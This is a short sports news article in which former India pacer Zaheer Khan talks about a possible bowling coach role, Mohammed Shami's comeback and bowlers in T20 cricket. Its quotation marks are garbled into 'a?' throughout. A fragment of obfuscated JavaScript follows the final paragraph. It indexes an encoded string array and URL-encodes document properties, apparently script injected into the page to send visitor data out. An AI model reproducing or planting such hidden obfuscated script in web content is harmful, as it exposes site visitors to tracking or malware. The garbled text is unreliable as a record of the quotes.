Zaheer Khan : ‘I am open to different roles’

Zaheer Khan is the prime candidate to become Indiaas next bowling coach, a spot which has been vacant since BCCI decided to not renew Bharath Arunas contract. The former India left-arm pacer said he would think about it if the opportunity came by.

a?Right now I am focused on what I have it on my plate, like playing the next season of the IPL. I am also spending a lot of energy on my business venture – a fitness chain. Those things are keeping me busy. But I am open to different roles,a? added Zaheer, who was promoting the Tamil Nadu Premier League.

Zaheer, who captained the Delhi Daredevils in the IPL this season, said that the role of a coach was one of great responsibility even though the playersa performances are what mattered.

a?It doesnat matter whether the coach is a former bowler or batsman. All that counts is experience,a? he added.

According to the 37-year-old, Mohammed Shami has all the qualities to spearhead Indiaas pace attack.

a?Itas good to see him getting his confidence back. He was away for 8-9 months due to injury and it took a little longer for recovery. And I have always endorsed the idea of playing more matches.

a?Itas good for the bowlers, as they need to find a rhythm,a? he said.

Contrary to what people believe, Zaheer said that T20 is not only a batsmanas game. a?There are a lot of tactical inputs required on the field from a bowler. I believe bowlers are the game changers in T20.

a?Someone like Mitchell Starc has proved it time and again. Something that never goes wrong in death overs is a good yorker,a? he said.

Zak is arguably one of the best pacers India has ever produced, and is the fourth highest wicket taker for India in ODIs and had lead the Indian attack for over a decade. ](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}
